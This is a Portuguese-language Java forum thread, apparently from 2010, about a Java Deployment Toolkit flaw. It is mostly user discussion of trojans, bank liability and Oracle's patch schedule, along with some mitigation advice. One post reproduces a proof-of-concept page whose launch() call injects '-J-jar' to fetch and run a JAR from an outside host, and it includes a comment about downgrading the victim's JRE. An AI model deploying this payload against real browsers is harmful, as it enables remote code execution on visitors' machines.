Bug em Java permite ataque de crackers; Sun menospreza falha

This message was edited 1 time. Last update was at 14/04/2010 11:49:48

rogelgarcia wrote:Link com um teste não nocivo

[REMOVIDO, TROJAN]

Vocês são doidos em ficar clicando assim né... pelo menos execute esses testes em um máquina virtual, tipo VMWare ou similar... e depois reverta o restore point...

O pior são aqueles que saem clicando e ainda logado como root... aí depois pega um trojan com nível de kernel e aí já viu né... conheço vários pessoas próximas que já tiveram o dinheiro zerado e limite do cheque especial no talo...

Essas vulnerabilidades são super comuns... todo mês aparece 1 ou 2... não tem FireWall ou Anti-Vírus que vai pegar isso, porque esse pessoal que fica instalando Trojan só usa executáveis que nunca foram pegos na assinatura e ainda por cima usam comunicação através do próprio IE... ou seja a porta 80... e ainda com processo atachado ao IE...

GUJ Master Membro desde: 20/05/2009 11:21:32 Mensagens: 1776 Offline

Leozin wrote:Por acaso alguém recebeu algum email da Atlassian sugerindo a todos para trocar de senha?

Parece que houve um problema sério lá, sabem me dizer se isso estava ligado com esse exploit?

Não. Essa foi por alguem descobriu que Atlassian guarda passwords dos seus clientes em arquivo texto mesmo.

This message was edited 1 time. Last update was at 14/04/2010 00:34:00

Bom dia,

Obrigado santoro pela informação.

Nota : Crackers não são criminosos !! duas coisas differentes. Crime é um adjetivo muito forte nestes casos ...

A segurança do computador é uma questão de ser cuidadosos e estar bem informado.

Eu à mais de 10 anos sem problemas com vírus, trojans, worms, mas eu vi passar Sasser, I love you ... etc.
O unico vírus que eu tenho em minha máquina chama-se : Norton.

Depois de ter instalado jdk1.6.0_19 e o JRE 1.6.0_19 associado :

Eu testei no Win XP :

---> Mozilla 1.7.13 : Resultado : Nada !
---> Mozilla SeaMonkey 1.1.16 : Resultado : Nada !

---> Mozilla Firefox 3.6.3 : Resultado : Calc
---> Google Chrome 4.1.249.1045 : Resultado : Calc
---> Safari 4.0.5 : Resultado : Calc

---> IE x não utiliso !
---> Opera (Eu não testei)

Soluções :

1- Não instale o JRE apenas JDK (config env vars PATH e JAVA_HOME)
2- Configura o browser para que ele não pode executar Java.
3- Utilise JDK 7 (Eu não testei) https://jdk7.dev.java.net/

4- Outras ??

//-------------------------------------- Code Analysis testcase.html -------------

<html>
<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
    
<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

//-->
</script>

var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";

if (window.navigator.appName == "Microsoft Internet Explorer") {
            var o = document.createElement("OBJECT");

o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";

// Trigger the bug
            o.launch(u);
        } else {
            // Mozilla
            var o = document.createElement("OBJECT");
            var n = document.createElement("OBJECT");

o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
            n.type = "application/java-deployment-toolkit";
            document.body.appendChild(o);
            document.body.appendChild(n);

// Test both MIME types
            try {
                // Old type
                o.launch(u);
            } catch (e) {
                // New type
                n.launch(u);
            }
        }

// Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
        // this classic exploit?
        // http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1

// o.installJRE("1.4.2_18");
    </script>
</body>
</html>

//-----------------------------------Code Analysis Main.class in file calc.jar -----------

Contexto :
O erro está relacionado com o plugin Java Deployment Toolkit encontrado em navegadores web, devido à sua instalação automática com o JRE (Java Runtime Environment). Sugerido como um controle ActiveX para o Internet Explorer ou um plugin NPAPI para o Firefox e outros , Java Deployment Toolkit é considerado seguro e fornece aos desenvolvedores um caminho para distribuir suas aplicações para os usuários finais.

Problema :
Argumentos arbitrários podem ser passados para javaw.exe e executar um arquivo JAR .

Solução :
Desativar o JavaScript não protege contra a exploração da vulnerabilidade. Para o Internet Explorer, parar o ActiveX classe CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA , e para o Firefox para desabilitar o Java Deployment Toolkit a partir do gerenciador de plugins.

Abraços

Li esta notícia no trabalho hoje de manhã.
Depois do expediente, fui pesquisar no google algumas características de um celular que estou interessado em comprar.
Entrei em um dos primeiros links do resultado da busca feita no google. Ao carregar a página, percebi um Java Web Start iniciando e pensei: "Ué, mas aonde que tem java nesta página?".
Não deu 2 minutos o meu antivírus estava avisando que tinha um vírus na minha máquina.

Será que irá acontecer uma onda de ataques utilizando java?
Eu acho um absurdo uma empresa como a Oracle dizer que só irá corrigir este problema de segurança no próximo update, daqui 3 meses, pois acabou de lançar um update agora.
Acredito que o Java tem uma reputação a zelar, mas enfim...

Vamos aguardar para ver o que acontece
Abraços

This message was edited 1 time. Last update was at 14/04/2010 11:50:00

Felipe Kan wrote:

rogelgarcia wrote:Link com um teste não nocivo

[REMOVIDO, TROJAN]

Vocês são doidos em ficar clicando assim né... pelo menos execute esses testes em um máquina virtual, tipo VMWare ou similar... e depois reverta o restore point...

O pior são aqueles que saem clicando e ainda logado como root... aí depois pega um trojan com nível de kernel e aí já viu né... conheço vários pessoas próximas que já tiveram o dinheiro zerado e limite do cheque especial no talo...

Essas vulnerabilidades são super comuns... todo mês aparece 1 ou 2... não tem FireWall ou Anti-Vírus que vai pegar isso, porque esse pessoal que fica instalando Trojan só usa executáveis que nunca foram pegos na assinatura e ainda por cima usam comunicação através do próprio IE... ou seja a porta 80... e ainda com processo atachado ao IE...

Os bancos que resolvam isto pra mim, eu nao tenho nada haver com isto!!

Quem perdeu cheque especial, limite e o escambau e ficou quieto mané que é, os bancos cobrem isto, é obrigaçao deles lhe dar segurança.

JavaEvangelist Membro desde: 21/11/2004 16:40:00 Mensagens: 424 Offline

fredferrao wrote:
Os bancos que resolvam isto pra mim, eu nao tenho nada haver com isto!!
Quem perdeu cheque especial, limite e o escambau e ficou quieto mané que é, os bancos cobrem isto, é obrigaçao deles lhe dar segurança.

E depois reclamam dos políticos do pais...

clone_zealot wrote:

fredferrao wrote:
Os bancos que resolvam isto pra mim, eu nao tenho nada haver com isto!!
Quem perdeu cheque especial, limite e o escambau e ficou quieto mané que é, os bancos cobrem isto, é obrigaçao deles lhe dar segurança.

E depois reclamam dos políticos do pais...

Porque?? Algo errado? Se voce me oferece um sistema a segurança tem que vir junto. Tanto é que todos os casos que tenho conhecimento o banco ressarciu na hora o cliente lesado por fraude.
Inclusive meu cartão quando foi clonado não tive problema algum, alias a propria operadora identificou pra mim e tomou todas as ações.

Nao misture as coisas, nao estamos falando de politica. Estamos falando de produtos e empresas e na segurança destes produtos.

GUJ Master Membro desde: 20/05/2009 11:21:32 Mensagens: 1776 Offline

fredferrao wrote:

clone_zealot wrote:

fredferrao wrote:
Os bancos que resolvam isto pra mim, eu nao tenho nada haver com isto!!
Quem perdeu cheque especial, limite e o escambau e ficou quieto mané que é, os bancos cobrem isto, é obrigaçao deles lhe dar segurança.

E depois reclamam dos políticos do pais...

Porque?? Algo errado? Se voce me oferece um sistema a segurança tem que vir junto. Tanto é que todos os casos que tenho conhecimento o banco ressarciu na hora o cliente lesado por fraude.
Inclusive meu cartão quando foi clonado não tive problema algum, alias a propria operadora identificou pra mim e tomou todas as ações.

Nao misture as coisas, nao estamos falando de politica. Estamos falando de produtos e empresas e na segurança destes produtos.

Acho que ele pensa que todo cidadão deveria ser especialista em segurança na rede.

Aqui abriu a Calculadora

This message was edited 1 time. Last update was at 14/04/2010 10:47:03

Será que tem relação
com James Gosling confirma sua saída da Oracle?

Vou trancar o tópico pq o código está gerando transtornos para o pessoal. Aqui acusou no anti-vírus também.

Atendendo a pedidos, desbloqueei o tópico e removi todos os links acima.

rogelgarcia wrote:A Oracle segue a filosofia que anda em moda hoje em dia:

O importante é vender, funcionar é um detalhe!

Seria complicado se até os produtos que eles vendem fosse assim. Para abaixar a poeira vamos considerar que isso só rola com o Java, porque ele não é vendido!

ahsuahusha

Debugger Membro desde: 13/01/2009 16:31:46 Mensagens: 69 Offline

Atualização daqui 3 meses ?

Humm... Entendi, a Oracle deu um prazo de 3 meses para pensar quantos cobrar pela a atualização, do jeito que as coisas andam eu não dúvido nada.

Olá

JxtaNode wrote:
Depois de ter instalado jdk1.6.0_19 e o JRE 1.6.0_19 associado :

Eu testei no Win XP :

---> Mozilla 1.7.13 : Resultado : Nada !
---> Mozilla SeaMonkey 1.1.16 : Resultado : Nada !

---> Mozilla Firefox 3.6.3 : Resultado : Calc
---> Google Chrome 4.1.249.1045 : Resultado : Calc
---> Safari 4.0.5 : Resultado : Calc

---> IE x não utiliso !
---> Opera (Eu não testei)

Seria bom alguém repetir estes testes com a versão 20 lançada hoje http://java.sun.com/javase/downloads/widget/jdk6.jsp

Release notes em http://java.sun.com/javase/6/webnotes/6u20.html

[]s
Luca

Notícias, artigos e o maior fórum brasileiro sobre Java